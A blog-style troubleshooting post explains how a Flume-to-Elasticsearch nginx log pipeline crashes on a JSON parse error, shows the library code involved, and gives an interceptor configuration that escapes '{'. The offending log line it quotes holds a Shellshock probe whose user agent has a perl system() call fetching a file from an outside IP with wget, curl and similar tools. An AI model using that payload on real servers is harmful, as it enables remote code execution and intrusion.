Flume nginx log processing exception: JsonParseException: Unexpected character ('(' (code 40)): expected a valid value

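Recently, our Flume agent that processes nginx logs has been stopping every few days with a JSON deserialization exception.

Exception stack trace: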

2016/01/26 14:37:49.043 [ERROR] [] [] [SinkRunner-PollingRunner-DefaultSinkProcessor] [org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:160)]  Unable to deliver event. Exception follows.
org.apache.flume.EventDeliveryException: Failed to commit transaction. Transaction rolled back.
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:227)
    at org.apache.flume.sink.DefaultSinkProcessor.process(DefaultSinkProcessor.java:68)
    at org.apache.flume.SinkRunner$PollingRunner.run(SinkRunner.java:147)
    at java.lang.Thread.run(Thread.java:745)
Caused by: org.elasticsearch.common.jackson.core.JsonParseException: Unexpected character ('(' (code 40)): expected a valid value (number, String, array, object, 'true', 'false' or 'null')
 at [Source: [B@78f004c9; line: 1, column: 2]
    at org.elasticsearch.common.jackson.core.JsonParser._constructError(JsonParser.java:1487)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportError(ParserMinimalBase.java:518)
    at org.elasticsearch.common.jackson.core.base.ParserMinimalBase._reportUnexpectedChar(ParserMinimalBase.java:447)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._handleUnexpectedValue(UTF8StreamJsonParser.java:2485)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser._nextTokenNotInObject(UTF8StreamJsonParser.java:801)
    at org.elasticsearch.common.jackson.core.json.UTF8StreamJsonParser.nextToken(UTF8StreamJsonParser.java:697)
    at org.elasticsearch.common.xcontent.json.JsonXContentParser.nextToken(JsonXContentParser.java:51)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.addComplexField(ContentBuilderUtil.java:60)
    at org.apache.flume.sink.elasticsearch.ContentBuilderUtil.appendField(ContentBuilderUtil.java:47)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.appendHeaders(ElasticSearchLogStashEventSerializer.java:131)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:80)
    at org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer.getContentBuilder(ElasticSearchLogStashEventSerializer.java:73)
    at org.apache.flume.sink.elasticsearch.client.ElasticSearchTransportClient.addEvent(ElasticSearchTransportClient.java:164)
    at org.apache.flume.sink.elasticsearch.ElasticSearchSink.process(ElasticSearchSink.java:189)

Following the stack trace into the code, ElasticSearchLogStashEventSerializer.appendHeaders contains:

builder.startObject("@fields");
for (String key : headers.keySet()) {
  byte[] val = headers.get(key).getBytes(charset);
  ContentBuilderUtil.appendField(builder, key, val);
}

So the failure happens while the event headers are being serialized, inside ContentBuilderUtil:

public static void appendField(XContentBuilder builder, String field,
    byte[] data) throws IOException {
  XContentType contentType = XContentFactory.xContentType(data);
  if (contentType == null) {
    addSimpleField(builder, field, data);
  } else {
    addComplexField(builder, field, contentType, data);
  }
}

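The content type of each header value is decided by XContentFactory.xContentType(data). Judging from the stack trace above (addComplexField calling JsonXContentParser), the value was classified as JSON and then failed to parse. Looking at how that method detects JSON, there is this piece of code: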

// a last chance for JSON
for (int i = 0; i < length; i++) {
    if (bytes.get(i) == '{') {
        return XContentType.JSON;
    }
}
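To make the consequence of that loop concrete, here is a minimal sketch in plain Java. It is not the Elasticsearch implementation: looksLikeJson is a hypothetical stand-in that reproduces only the quoted loop, it scans the whole array rather than the first `length` bytes, and it skips any checks the real method performs earlier. The user agent strings are illustrative, with the first abbreviated from the request that caused the failure.

```java
import java.nio.charset.StandardCharsets;

final class LastChanceJsonCheck {
    // Hypothetical stand-in for the quoted "last chance for JSON" loop:
    // reports JSON as soon as any byte equals '{'.
    static boolean looksLikeJson(byte[] bytes) {
        for (byte b : bytes) {
            if (b == '{') {
                return true;
            }
        }
        return false;
    }

    public static void main(String[] args) {
        // Abbreviated user agent containing a brace, and an ordinary one.
        String probeAgent = "() { :;};/usr/bin/perl -e '...'";
        String normalAgent = "Mozilla/5.0 (X11; Linux x86_64)";

        System.out.println(looksLikeJson(probeAgent.getBytes(StandardCharsets.UTF_8)));
        System.out.println(looksLikeJson(normalAgent.getBytes(StandardCharsets.UTF_8)));
    }
}
```

Under this simplified check the first string is treated as JSON even though it starts with '(', which matches the "Unexpected character ('('" message in the stack trace.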

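No wonder it breaks: a value with a '{' anywhere in the inspected bytes is treated as JSON. Next, I looked for the log entry that triggered the exception: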

54.204.47.156 - - [2016-01-19T12:50:57+08:00] "GET /index.cgi HTTP/1.1" 301 184 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://204.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download  http://204.232.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png  \x22);'" "-" "5.000" "-" "-"
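One way to confirm which field carries the brace is to run the line through the extraction pattern. The sketch below uses the same pattern as the i1.regex setting in the configuration further down, written as a Java string literal, and takes capture group 9, which serializer s9 maps to user_agent. The class and method names are hypothetical, and the sample line is an abbreviated copy of the entry above (the long perl payload is cut to '...').

```java
import java.util.regex.Matcher;
import java.util.regex.Pattern;

final class NginxLineFields {
    // Same pattern as agent.sources.www.interceptors.i1.regex, as a Java literal.
    static final Pattern LINE = Pattern.compile(
        "([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\""
        + "\\s+(\\d+)\\s+(\\d+)"
        + "\\s+\"([^\"]*)\"\\s+\"([^\"]*)\"\\s+\"([^\"]*)\""
        + "\\s+\"([^\"]*)\"\\s+\"([^\"]*)\"\\s+\"([^\"]*)\"");

    // Returns capture group 9 (user_agent), or null when the line does not match.
    static String userAgent(String line) {
        Matcher m = LINE.matcher(line);
        return m.find() ? m.group(9) : null;
    }

    public static void main(String[] args) {
        // Abbreviated copy of the failing log entry.
        String line = "54.204.47.156 - - [2016-01-19T12:50:57+08:00] "
            + "\"GET /index.cgi HTTP/1.1\" 301 184 \"-\" "
            + "\"() { :;};/usr/bin/perl -e '...'\" \"-\" \"5.000\" \"-\" \"-\"";

        String ua = userAgent(line);
        System.out.println(ua);
        System.out.println(ua != null && ua.indexOf('{') >= 0);
    }
}
```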

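It turns out the user agent string contains a '{' (the request appears to be a Shellshock-style probe, with a user agent beginning "() { :;};"). The fix is to add a search_replace interceptor, named sr below, that replaces '{' with %7b before the fields are extracted: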

agent.sources.www.type = exec 
agent.sources.www.command = tail -F -n 0 /data/nginx/logs/www.longdai.com.log
agent.sources.www.restart = true
agent.sources.www.logStdErr = true
agent.sources.www.batchSize = 200
agent.sources.www.channels = fch

agent.sources.www.interceptors = cdn sr www i1 
agent.sources.www.interceptors.www.type = static
agent.sources.www.interceptors.www.key = app
agent.sources.www.interceptors.www.value = www
agent.sources.www.interceptors.cdn.type = regex_filter
agent.sources.www.interceptors.cdn.regex = .*\\s+\\"ChinaCache\\"\\s+.*
agent.sources.www.interceptors.cdn.excludeEvents = true

agent.sources.www.interceptors.sr.type=search_replace
agent.sources.www.interceptors.sr.searchPattern=\\{
agent.sources.www.interceptors.sr.replaceString=%7b
agent.sources.www.interceptors.sr.charset=UTF-8

agent.sources.www.interceptors.i1.type = regex_extractor
agent.sources.www.interceptors.i1.regex = ([^\\s]*)\\s-\\s([^\\s]*)\\s\\[(.*)\\]\\s+\\"([\\S]*)\\s+([\\S]*)\\s+[\\S]*\\"\\s+(\\d+)\\s+(\\d+)\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"\\s+\\"([^\\"]*)\\"
agent.sources.www.interceptors.i1.serializers = s1 s2 s3 s4 s5 s6 s7 s8 s9 s10 s11 s12 s13
agent.sources.www.interceptors.i1.serializers.s1.name = remote_addr
agent.sources.www.interceptors.i1.serializers.s2.name = remote_user
agent.sources.www.interceptors.i1.serializers.s3.name = datetime
#agent.sources.www.interceptors.i1.serializers.s3.type = org.apache.flume.interceptor.RegexExtractorInterceptorMillisSerializer
#agent.sources.www.interceptors.i1.serializers.s3.name = timestamp
#agent.sources.www.interceptors.i1.serializers.s3.pattern = yyyy-MM-dd'T'HH:mm:ssZ
agent.sources.www.interceptors.i1.serializers.s4.name = http_method
agent.sources.www.interceptors.i1.serializers.s5.name = uri
agent.sources.www.interceptors.i1.serializers.s6.name = status
agent.sources.www.interceptors.i1.serializers.s7.name = body_length
agent.sources.www.interceptors.i1.serializers.s8.name = http_referer
agent.sources.www.interceptors.i1.serializers.s9.name = user_agent
agent.sources.www.interceptors.i1.serializers.s10.name = http_x_forwarded_for
agent.sources.www.interceptors.i1.serializers.s11.name = request_time
agent.sources.www.interceptors.i1.serializers.s12.name = upstream_addr
agent.sources.www.interceptors.i1.serializers.s13.name = upstream_response_time

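# Note: i2 and i3 are not listed in agent.sources.www.interceptors above, so they are not active as written.
agent.sources.www.interceptors.i2.type = timestamp
agent.sources.www.interceptors.i3.type = host
agent.sources.www.interceptors.i3.hostHeader = hostname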


agent.sinks.elasticSearch.type = org.apache.flume.sink.elasticsearch.ElasticSearchSink
agent.sinks.elasticSearch.channel = fch
agent.sinks.elasticSearch.batchSize = 2000
agent.sinks.elasticSearch.hostNames = 172.16.0.18:9300
agent.sinks.elasticSearch.indexName = nginx
agent.sinks.elasticSearch.indexType = nginx
agent.sinks.elasticSearch.clusterName = longdai 
agent.sinks.elasticSearch.client = transport
agent.sinks.elasticSearch.serializer = org.apache.flume.sink.elasticsearch.ElasticSearchLogStashEventSerializer
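The effect of the sr interceptor can be approximated in plain Java. This is a sketch under assumptions rather than Flume's own code: it assumes the interceptor applies the pattern to the event body as a regular-expression replace-all, and the class and method names are hypothetical. The pattern is sr.searchPattern after properties unescaping (\{), and the replacement is sr.replaceString.

```java
import java.util.regex.Pattern;

final class BraceEscaper {
    // sr.searchPattern after properties unescaping: a literal '{'.
    static final Pattern SEARCH = Pattern.compile("\\{");
    // sr.replaceString from the configuration.
    static final String REPLACEMENT = "%7b";

    // Replaces every '{' in the event body with "%7b".
    static String escapeBraces(String body) {
        return SEARCH.matcher(body).replaceAll(REPLACEMENT);
    }

    public static void main(String[] args) {
        // Abbreviated fragment of the failing log entry.
        String body = "\"-\" \"() { :;};/usr/bin/perl -e '...'\"";
        String escaped = escapeBraces(body);

        System.out.println(escaped);
        // No '{' is left for the JSON detection loop to find.
        System.out.println(escaped.indexOf('{') < 0);
    }
}
```

Because sr comes before i1 in the interceptors list, the user_agent header is extracted from the already-escaped body. Only the opening brace is replaced; the closing '}' is left alone, which is enough for the check quoted earlier since it looks only for '{'.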

The full Flume configuration for processing nginx logs is described here:

http://blog.csdn.net/lanmo555/article/details/50483561
